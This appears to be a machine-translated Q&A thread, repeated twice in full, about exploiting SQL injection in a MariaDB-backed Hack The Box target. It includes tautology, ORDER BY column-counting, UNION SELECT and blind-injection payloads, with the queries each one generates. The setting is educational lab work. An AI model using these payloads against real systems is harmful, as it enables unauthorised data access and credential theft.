MariaDb SQL 注入
MariaDb SQL Injection
我正在尝试(合法地)利用具有 SQLi 漏洞的 MariaDb 数据库。
我已经确定了这里的漏洞...
/?o=1&page=app
o=* 易受攻击并产生以下错误...
DEBUG INFO: You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near '5' or dest like '1'') LIMIT 10' at line 1
我正在使用 Burp Suite 并发现了以下语法,它似乎更接近标记但仍然产生语法错误。
我认为它更接近标记,因为错误只是吐出我引入的查询而不是 'extra' 字段:'5' or dest like '1'') LIMIT 10'.
我假设这是原始查询的一部分,因为包含了 1 并且当我用其他随机字符串进行测试时仍然为真。
我在寻找管理员密码哈希,我从页面线索中知道是 uid 1。
我在这个查询中遗漏了什么?
SELECT Password FROM mysql.user WHERE (uid = '1' or dest like '%')-- ') LIMIT 10
编辑:这是在 Hack The Box 上完成的,因此不会发生令人讨厌的非法行为。
一些观察:
mysql.usertable不包括uid或dest
列
要利用 SQL 注入漏洞,我们必须在动态构造的 SQL 语句的上下文中工作。
如果应用程序SQL语句的形式为:
SELECT somecol FROM sometable WHERE keycol = 'x' ORDER BY foo LIMIT 1
x 的值被合并到 SQL 文本中;我们可以尝试提供 'x' 的值,这将形成一个有效的 SQL 语句。但是我们不"break out"前面的语句。
如果我们试图包含另一个 FROM 子句,从另一个 table 中提取数据,我们可能会考虑制定如下语句:
SELECT somecol FROM sometable WHERE keycol = 'foo' AND 1=0
UNION ALL
SELECT expr FROM anothertable ORDER BY expr LIMIT 1 -- '
可能存在多语句漏洞,我们可以执行多条语句。
但我们不需要花很多时间来弄清楚如何利用它;花时间和精力修复应用程序以关闭漏洞会更好。
EDIT: This is being done on Hack The Box so no nasty illegal stuff
going on.
好吧,让我们玩得开心。
当我查看错误信息时
DEBUG INFO: You have an error in your SQL syntax; check the manual
that corresponds to your MariaDB server version for the right syntax
to use near '5' or dest like '1'') LIMIT 10' at line 1
我假设应用程序中的查询和代码或多或少类似于这种伪智慧,@o 实际上是一个 MySQL 用户变量..
SELECT
*
FROM
DUMMY_TABLE
WHERE
DUMMY_TABLE.o = '",@o,"'
LIMIT 10
我将使用 SQL fiddle space 来模拟 SQL 注入测试和更多可能访问其他 tables。
您可以使用 1' OR 1 = 1# 或 1' OR 1 = 1-- 测试您的注入,当您使用 1 作为输入时,两者都应该工作并且应该给您相同的结果。
这是因为 MariaDB 自动为其他数据库转换类型,您可能需要使用更严格的版本 1' OR '1' = '1#
哪个应该生成
SELECT * FROM DUMMY_TABLE WHERE DUMMY_TABLE.o = '1' OR 1 = 1#' LIMIT 10
或
SELECT * FROM DUMMY_TABLE WHERE DUMMY_TABLE.o = '1' OR 1 = 1--' LIMIT 10
然后因为您在应用程序中看到错误,您可以使用 ORDER BY 1 检查选择了多少列并递增数字直到出现错误。
错误:ER_BAD_FIELD_ERROR:'order clause'
中的未知列“2”
注入
1' ORDER BY 1# 或 1' ORDER BY 1--
这意味着对结果集中的第一列进行排序 NOT 排序 1 文字。
生成
SELECT * FROM DUMMY_TABLE WHERE DUMMY_TABLE.o = '1' ORDER BY 1#' LIMIT 10
或
SELECT * FROM DUMMY_TABLE WHERE DUMMY_TABLE.o = '1' ORDER BY 1--' LIMIT 10
当您知道这些列时,您可以使用 UNION 进入其他 table。如果不需要所有列,请使用 NULL。
注射
1' UNION ALL SELECT NULL FROM DUAL#
注意DUAL在MariaDB、MySQL和Oracle中是一个"virtual"不存在的table,如果你能查询到这个"table"就说明你技术上也可以进入其他 tables。
生成SQL
SELECT * FROM DUMMY_TABLE WHERE DUMMY_TABLE.o = '1' UNION ALL SELECT NULL FROM DUAL#' LIMIT 10
如果网页设计为 "detail" 页面,其中一条记录始终可见,则您需要在注入中添加 LIMIT 1, 1。
如果 Web 应用程序中没有可见的错误,您应该能够通过盲目 SQL 注入来盲目地暴力破解 geuss 并查看应用程序如何工作。
在尝试暴力使用的列号之前,还可以尝试 ?o=0、?o=NULL 或非常大的数字,例如最大 INT 值(有符号)?o=2147483647 或(无符号)?o=4294967295所以您知道应用程序如何处理无法找到的记录。
因为它不太可能有 id 0 或 INT 数据类型上的高数字,因为如果给出最后一个数字,应用程序将停止工作。
如果您仍然获得具有这些高数字的记录,请改用 BIGINT 数据类型的最大值。
对于第 1 列相同的结果 ID o=1
1' UNION ALL SELECT 1 FROM DUAL LIMIT 1, 1#
对于将出错的第 2 列,您很可能会看到错误页面或未找到记录的消息。
或者甜蜜的 HTTP 404(未找到)错误状态。
1' UNION ALL SELECT 1 FROM DUAL LIMIT 1, 1#
使用 LIMIT 而不使用 ORDER BY 时可能会遇到的一个问题是可能会获得相同的记录,因为 SQL 标准定义了 SQL tables/resultsets 无序 不使用 ORDER BY
因此,理想情况下,您需要在暴力破解中继续使用 ORDER BY 1。
1' UNION ALL SELECT 1 FROM DUAL ORDER BY 1 DESC#
和
1' UNION ALL SELECT 1 FROM DUAL ORDER BY 1 DESC LIMIT 1, 1#
数据库对 ORDER BY 1 的支持比我最初想的要好,因为它在 MySQL、MariaDB、SQL 服务器(MSSQL)和PostgreSQL.
另外 ORDER BY 1 是 SQL 92 功能,已在 SQL 99 中删除。
所以实际上 SQL 数据库不应该再执行 ORDER BY 1 如果他们在这一点上遵循 SQL 标准。
SQL 92 BNF
<sort specification list> ::=
<sort specification> [ { <comma> <sort specification> }... ]
<sort specification> ::=
<sort key> [ <collate clause > ] [ <ordering specification> ]
<sort key> ::=
<column name>
| <unsigned integer> # <- here it is
<ordering specification> ::= ASC | DESC
vs SQL 1999 BNF
<sort specification list> ::=
<sort specification> [ { <comma> <sort specification> }... ]
<sort specification> ::=
<sort key> [ <collate clause > ] [ <ordering specification> ]
<sort key> ::=
<column name>
# <- missing
<ordering specification> ::= ASC | DESC
我正在尝试(合法地)利用具有 SQLi 漏洞的 MariaDb 数据库。
我已经确定了这里的漏洞...
/?o=1&page=app
o=* 易受攻击并产生以下错误...
DEBUG INFO: You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near '5' or dest like '1'') LIMIT 10' at line 1
我正在使用 Burp Suite 并发现了以下语法,它似乎更接近标记但仍然产生语法错误。
我认为它更接近标记,因为错误只是吐出我引入的查询而不是 'extra' 字段:'5' or dest like '1'') LIMIT 10'.
我假设这是原始查询的一部分,因为包含了 1 并且当我用其他随机字符串进行测试时仍然为真。
我在寻找管理员密码哈希,我从页面线索中知道是 uid 1。
我在这个查询中遗漏了什么?
SELECT Password FROM mysql.user WHERE (uid = '1' or dest like '%')-- ') LIMIT 10
编辑:这是在 Hack The Box 上完成的,因此不会发生令人讨厌的非法行为。
一些观察:
mysql.usertable不包括uid或dest
要利用 SQL 注入漏洞,我们必须在动态构造的 SQL 语句的上下文中工作。
如果应用程序SQL语句的形式为:
SELECT somecol FROM sometable WHERE keycol = 'x' ORDER BY foo LIMIT 1
x 的值被合并到 SQL 文本中;我们可以尝试提供 'x' 的值,这将形成一个有效的 SQL 语句。但是我们不"break out"前面的语句。
如果我们试图包含另一个 FROM 子句,从另一个 table 中提取数据,我们可能会考虑制定如下语句:
SELECT somecol FROM sometable WHERE keycol = 'foo' AND 1=0
UNION ALL
SELECT expr FROM anothertable ORDER BY expr LIMIT 1 -- '
可能存在多语句漏洞,我们可以执行多条语句。
但我们不需要花很多时间来弄清楚如何利用它;花时间和精力修复应用程序以关闭漏洞会更好。
EDIT: This is being done on Hack The Box so no nasty illegal stuff going on.
好吧,让我们玩得开心。
当我查看错误信息时
DEBUG INFO: You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near '5' or dest like
'1'') LIMIT 10'at line 1
我假设应用程序中的查询和代码或多或少类似于这种伪智慧,@o 实际上是一个 MySQL 用户变量..
SELECT
*
FROM
DUMMY_TABLE
WHERE
DUMMY_TABLE.o = '",@o,"'
LIMIT 10
我将使用 SQL fiddle space 来模拟 SQL 注入测试和更多可能访问其他 tables。
您可以使用 1' OR 1 = 1# 或 1' OR 1 = 1-- 测试您的注入,当您使用 1 作为输入时,两者都应该工作并且应该给您相同的结果。
这是因为 MariaDB 自动为其他数据库转换类型,您可能需要使用更严格的版本 1' OR '1' = '1#
哪个应该生成
SELECT * FROM DUMMY_TABLE WHERE DUMMY_TABLE.o = '1' OR 1 = 1#' LIMIT 10
或
SELECT * FROM DUMMY_TABLE WHERE DUMMY_TABLE.o = '1' OR 1 = 1--' LIMIT 10
然后因为您在应用程序中看到错误,您可以使用 ORDER BY 1 检查选择了多少列并递增数字直到出现错误。
错误:ER_BAD_FIELD_ERROR:'order clause'
中的未知列“2”注入
1' ORDER BY 1# 或 1' ORDER BY 1--
这意味着对结果集中的第一列进行排序 NOT 排序 1 文字。
生成
SELECT * FROM DUMMY_TABLE WHERE DUMMY_TABLE.o = '1' ORDER BY 1#' LIMIT 10
或
SELECT * FROM DUMMY_TABLE WHERE DUMMY_TABLE.o = '1' ORDER BY 1--' LIMIT 10
当您知道这些列时,您可以使用 UNION 进入其他 table。如果不需要所有列,请使用 NULL。
注射
1' UNION ALL SELECT NULL FROM DUAL#
注意DUAL在MariaDB、MySQL和Oracle中是一个"virtual"不存在的table,如果你能查询到这个"table"就说明你技术上也可以进入其他 tables。
生成SQL
SELECT * FROM DUMMY_TABLE WHERE DUMMY_TABLE.o = '1' UNION ALL SELECT NULL FROM DUAL#' LIMIT 10
如果网页设计为 "detail" 页面,其中一条记录始终可见,则您需要在注入中添加 LIMIT 1, 1。
如果 Web 应用程序中没有可见的错误,您应该能够通过盲目 SQL 注入来盲目地暴力破解 geuss 并查看应用程序如何工作。
在尝试暴力使用的列号之前,还可以尝试 ?o=0、?o=NULL 或非常大的数字,例如最大 INT 值(有符号)?o=2147483647 或(无符号)?o=4294967295所以您知道应用程序如何处理无法找到的记录。
因为它不太可能有 id 0 或 INT 数据类型上的高数字,因为如果给出最后一个数字,应用程序将停止工作。
如果您仍然获得具有这些高数字的记录,请改用 BIGINT 数据类型的最大值。
对于第 1 列相同的结果 ID o=1
1' UNION ALL SELECT 1 FROM DUAL LIMIT 1, 1#
对于将出错的第 2 列,您很可能会看到错误页面或未找到记录的消息。
或者甜蜜的 HTTP 404(未找到)错误状态。
1' UNION ALL SELECT 1 FROM DUAL LIMIT 1, 1#
使用 LIMIT 而不使用 ORDER BY 时可能会遇到的一个问题是可能会获得相同的记录,因为 SQL 标准定义了 SQL tables/resultsets 无序 不使用 ORDER BY
因此,理想情况下,您需要在暴力破解中继续使用 ORDER BY 1。
1' UNION ALL SELECT 1 FROM DUAL ORDER BY 1 DESC#
和
1' UNION ALL SELECT 1 FROM DUAL ORDER BY 1 DESC LIMIT 1, 1#
数据库对 ORDER BY 1 的支持比我最初想的要好,因为它在 MySQL、MariaDB、SQL 服务器(MSSQL)和PostgreSQL.
另外 ORDER BY 1 是 SQL 92 功能,已在 SQL 99 中删除。
所以实际上 SQL 数据库不应该再执行 ORDER BY 1 如果他们在这一点上遵循 SQL 标准。
SQL 92 BNF
<sort specification list> ::=
<sort specification> [ { <comma> <sort specification> }... ]
<sort specification> ::=
<sort key> [ <collate clause > ] [ <ordering specification> ]
<sort key> ::=
<column name>
| <unsigned integer> # <- here it is
<ordering specification> ::= ASC | DESC
vs SQL 1999 BNF
<sort specification list> ::=
<sort specification> [ { <comma> <sort specification> }... ]
<sort specification> ::=
<sort key> [ <collate clause > ] [ <ordering specification> ]
<sort key> ::=
<column name>
# <- missing
<ordering specification> ::= ASC | DESC